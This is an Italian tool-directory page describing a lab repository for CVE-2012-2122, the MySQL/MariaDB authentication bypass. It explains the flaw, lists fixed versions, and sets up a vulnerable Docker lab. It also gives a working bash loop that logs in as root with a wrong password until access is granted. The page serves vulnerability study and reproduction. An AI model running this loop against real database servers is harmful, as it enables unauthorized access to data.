Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Oracle-mysql-CVE-2012-2122 | Kitploit
Strumenti/GitHubGitHub/cyberharsh/oracle-mysql-cve-2012-2122
Analisi delle VulnerabilitàExploitPenetration TestingAutenticazioneSicurezza dei DatabaseLab e Pratica
GitHubcyberharsh/oracle-mysql-cve-2012-2122

Oracle-mysql-CVE-2012-2122

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
16 anni faNon ancora revisionato

Vulnerabilità di bypass dell'autenticazione Mysql (CVE-2012-2122)

Quando ci si connette a MariaDB/MySQL, la password inserita viene confrontata con quella corretta prevista; a causa di una gestione errata, anche se memcmp() restituisce un valore diverso da zero, MySQL può comunque considerare le due password identiche. In pratica, conoscendo solo il nome utente, è possibile accedere direttamente al database SQL tentando ripetutamente.

Versioni affette:

  • Le versioni di MariaDB dalla 5.1.62, 5.2.12, 5.3.6, 5.5.23 non sono vulnerabili.
  • Le versioni di MySQL dalla 5.1.63, 5.5.24, 5.6.6 non sono vulnerabili.

Link di riferimento:

  • http://www.freebuf.com/vuls/3815.html
  • https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/

Configurazione dell'ambiente

Dopo i test effettuati, sebbene questo ambiente venga eseguito all'interno di un container, la riuscita della riproduzione della vulnerabilità dipende in parte anche dall'host. È preferibile che l'host sia un sistema Ubuntu o Mac, ma non è garantito che funzioni sempre; saremo lieti di ricevere ulteriori risultati di test nella sezione Issue.

Eseguire il seguente comando per avviare l'ambiente di test:

root@kitploit:~
docker-compose up -d

Una volta avviato l'ambiente, verrà avviato un servizio Mysql (versione: 5.5.23) in ascolto sulla porta 3306. Con un normale client Mysql è possibile accedere direttamente; la password corretta per root è 123456.

Verifica della vulnerabilità

Senza conoscere la password corretta del nostro ambiente, eseguire il seguente comando in bash; dopo un certo numero di tentativi si riuscirà ad accedere:

root@kitploit:~
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

Per ulteriori metodi di test e sfruttamento, consultare i link di riferimento.

Scarica lo strumento